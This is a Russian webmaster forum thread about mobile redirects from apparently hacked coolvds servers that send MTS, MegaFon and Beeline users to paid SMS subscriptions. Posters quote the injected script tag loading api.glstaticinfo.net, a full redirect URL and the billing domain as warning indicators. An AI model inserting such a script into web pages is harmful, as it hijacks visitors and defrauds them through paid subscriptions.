Вернусь к теме мобильных редиректов с взломанных серверов coolvds. Удалось кое-что выяснить:
1) Вот сам вредоносный код, который залили на сервер: <script src="http://api.glstaticinfo.net/js/jquery.js" type="text/javascript"></script>
2) Вот ссылка редиректа: http:// advjoks[.]ru/mts_redirect.php?frame_domain=mp3-clushai[.]ru&frame_url=http%3A%2F%2Fmoipodpiski.ssl.mts[.]ru%2Flp%2F%3FSID%3D73f58a01-564f-f629-1926-32d73949937a%26tmpl%3Dmts_mp3-clushai[.]ru-music-2-min&prelend_url=%2F2%2F&lending_hash=823fe15c4ba040c3e2f00eff55647d53
3) Редирект мобильных пользователей происходил на платник: http://mp3-clushai.ru
4) Редирект работал через припаркованный домен advjoks.ru
5) Вот ссылка на биллинг, в которую сливали взломанный трафик: http://smscapital.ru/
На одном моем сайте код редиректа по прежнему стоит (ищем его). Так что если у кого-то данная проблема еще наблюдается, обратите внимание на инфу выше.
А за что санкции то накладывали? Накручивали рейтинг, или разместили звезды на всех страницах?
barslg, у вас походу используют зараженный софт. Каждый раз, когда настраивают новый сервер и переносят на него сайты - сайтам дается пометка, что на нем вирус <script src="api.glstaticinfo.net/js/jquery.js" type="text/javascript"></script>. Вам нужно серьезно заняться этим вопросом, а не просто брать, и "переустанавливать" NGNIX.
"Причину выяснить не удалось" - это ответ coolvds. Да и врядли ответят, чтобы новые "умники" не захотели повторить.
Сейчас наблюдаем, по факту - код могут снова запихнуть. Так что тут либо ждать, когда это повторится, либо потихоньку переносить сайты к другим.
erynok, вроде бы выяснили в чем была проблема (в ngnix). Теперь посмотрим, не повторится ли проблема снова. Яндекс снял отметку "опасный" с моих сайтов.
Посмотрите пожалуйста статус заявки.
Сайт: allbestbets.ru.
Раздел: World > Russian > Игры > Азартные игры > Спортивные ставки.
barslg, дело в том, что сливают только мобильных пользователей зашедших на сайты через интернет операторов мтс, мегафон или билайн. Заходить нужно через поиск яндекса и не через яндекс браузер.
barslg - может уже начнем нормально работать?
Добавил новый домен с 1 html страницей, так Яндекс и ему пометку вредоносного поставил. Вывод: 100% бэкдор на серверах Coolvds ворует мобильный трафик и сливает их на платные смс подписки.
Ребят, киньте пару рефок на VPS/VDS забугром.
Охренеть, в support тупо морозятся, говорят что все норм у них, хотя они даже и не проверяли сервера. У меня 2 сервера таких.
Ребят, у кого есть возможность зайти на несколько сайтов с мобильного мтс/мегафон/билайн ? От яндекса пришли сообщения о мобильном редиректе на 4 сайта, все на разных серерах. Не пойму, то ли рекламный партнер сливает, то ли сервера взломали т.к. на сайтах ничего не нашел.
